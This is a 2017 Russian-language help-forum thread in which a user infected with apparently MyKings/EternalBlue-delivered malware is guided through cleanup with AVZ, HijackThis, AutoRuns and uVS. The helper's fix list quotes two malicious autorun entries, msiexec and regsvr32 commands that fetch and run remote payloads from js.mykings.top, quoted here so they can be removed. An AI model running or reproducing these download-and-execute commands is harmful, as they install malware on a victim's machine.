Remote Access Trojan и не только

[Caonabo]

Так как длится этот хаос на моем компьютере уже некоторое время, полностью описать хронологию событий вряд ли смогу. В один прекрасный день антивирус(360 Total Security) заблокировал процесс, с именем состоящим только из цифр, расположенный в корневом каталоге диска С. После этого через некоторое время началась полная вакханалия. Антивирус начал регулярно блокировать процесс с именем net1.exe, который якобы пытается изменить какой-то пароль. При этом в это же время происходят различные изменения в реестре, одно из этих изменений - внесение в автозагрузку двух процессов, а именно, msiexec.exe и regsvr32.exe, оба имеют дальше в названии адрес сайта(даю только часть адреса) - js.mykings, я плохо разбираюсь в компьютерах, но мне показалось что этого там быть не должно, по этому адресу начал искать подобные проблемы у других людей, и нашел их немало. Помимо процессов в автозагрузке, добавляется скрипт в программу system32\wbem\wbemtest,exe, в названии этого скрипта присутствует мат, его я удалил, процессы из автозагрузки убрал, какое-то время ничего не происходило. Но к концу дня все вернулось обратно. Вчера помимо этого, появилось два exe процесса в папке Temp, один из них создал файл 360.cn в папке Program Files\Google, антивирус заблокировал процесс, он выдал ошибку приложения, я его закрыл, и больше он о себе не давал знать, но файлы не удалял. Сегодня снова появился файл с сомнительным названием в корневом каталоге диска C, он создал процесс с именем win32.exe в папке system32, антивирус расценил его как Trojan.Generic и удалил, но файл который создал этот процесс, так и остался в корневом каталоге, его ни я, ни антивирус не удалял.

 

Теперь некоторые особенности и ссылки на ресурсы, которые имеют полезную информацию и лучше объяснят в чем проблема.

-иногда в процессах ненадолго всплывают два от Adobe - acrord32.exe или что-то вроде того.

-процесс net1.exe, после которого вносятся изменения в реестр, появляется раз в 3 часа, но иногда это время может отклоняться в большую или меньшую сторону

-когда проходят 3 часа и вирус начинает свою магию, в диспетчере устройств фигурируют процессы с непонятными именами.

-вирус вероятно попадает на ПК через ту же уязвимость что и WannaCry, но после того как он там оказывается, он сам эту дыру блокирует, чтобы ему не мешали.

 

ссылка на блог в котором описывается проблема, там есть некоторые технические подробности, он на английском, к тому же я плохо разбираюсь в компьютерах, но для знающих людей это может быть полезно - https://www.cyphort.com/eternalblue-exploit-actively-used-deliver-remote-access-trojans/

ссылка на форум Dr. Web, конкретно в этом сообщении такая же проблема как и у меня, но там есть еще некоторые детали, по поводу которых я не уверен(Mysa, IUSR_Servs) - https://forum.drweb.com/index.php?showtopic=327461&p=827106

ссылка на сообщение, в котором такая же проблема и вероятное ее решение - https://forum.drweb.com/index.php?showtopic=327526&p=827994, обратите внимание на скрипт приведенный там, как минимум много общего с моей ситуацией.

Сегодня я отключил Службу Сервер + поставил патч закрывающий уязвимость, дало ли это какие-то плоды сейчас сказать не могу, возможно вирус вообще попал на ПК как-то иначе.

CollectionLog-2017.05.23-18.50.zip

Изменено 23 мая, 2017 пользователем Caonabo

[regist]

1)  - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.
 

2) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O4 - MSConfig\startupreg: [start1] C:\WINDOWS\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/05/23)
O4 - MSConfig\startupreg: [start] C:\WINDOWS\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/05/23)

 

3) пожалуйста, сделайте лог AutoRuns
Скачайте утилиту, распакуйте. Запустите правой кнопкой от имени администратора.
В меню Options -  Scan Options поставьте все галочки - нажмите Rescan.
Остальные настройки не трогайте. После этого дождитесь окончания создания списка. Сохраните лог - файл с расширением .arn
Заархивируйте его выложите его тут.

 

4) Сделайте полный образ автозапуска uVS, только программу скачайте отсюда.
 

[Caonabo]

Сначала мне нужно выключить антивирус, потом запустить браузер и сомнительные приложения, и только потом AVZ?

И обязательно запускать приложения которые наверняка являются вирусами?

[regist]

Можете ничего не запускать, выполнить скрипт как есть (с тем что и так  у вас запущено).

[Caonabo]

Не помню пароля от учетки админа, застрял на третьем пункте.

[Caonabo]

Запустил AutoRuns он сам начал сканирование, я дождался окончания, затем зашел в Options - Scan Options, поставил галочки во всех пунктах, нажал Rescan, после этого появляется список в котором только 1 пункт, это не то что нам нужно, верно?

Изменено 24 мая, 2017 пользователем Caonabo

[regist]

Ок, пришлите лог со снятыми галочками.

 

И главное про лог uVS не забудьте.

[Caonabo]

Нужно ли было отключать антивирус во время создания лога uVS? Во время работы программы антивирус вывел сообщение что она пытается изменить какой-то сертификат, и не дал этого сделать, тем не менее она закончила свою работу, написала что лог успешно создан. Что делать?

К тому же после работы программы в диспетчере задач появился процесс wlvjnc, что это такое?

Изменено 24 мая, 2017 пользователем Caonabo

[regist]

Перед запуском хелперских утилит надо отключать.

[Caonabo]

Т.е мне переделать лог и пусть меняет тот сертификат?

А с процессом тем что?

[regist]

ДА.

 

 

А с процессом тем что?

Это от утилиты. Делайте просто что указано, а то у вас одни вопросы уже целую неделю

[Caonabo]

https://virusinfo.info/virusdetector/report.php?md5=97198CEF45CF119C2118BCC7D1DC410F

uVS Log.7z

AutoRuns Log.zip

[regist]

1) Auslogics BoostSpeed, McAfee Security Scan Plus, Java 6 Update 30 - деинсталируйте.

 

2) Выполните скрипт в uVS
 

;uVS v4.0.5 [http://dsrt.dyndns.org]
;Target OS: NTv5.1
v400c
BREG
delref WMI_.[FUCKYOUMM2_FILTER]
restart

3) Сделайте свежий образ автозапуска.

[Caonabo]

Свежий лог

uVS Log2.7z

Изменено 24 мая, 2017 пользователем Caonabo

[regist]

что с проблемой?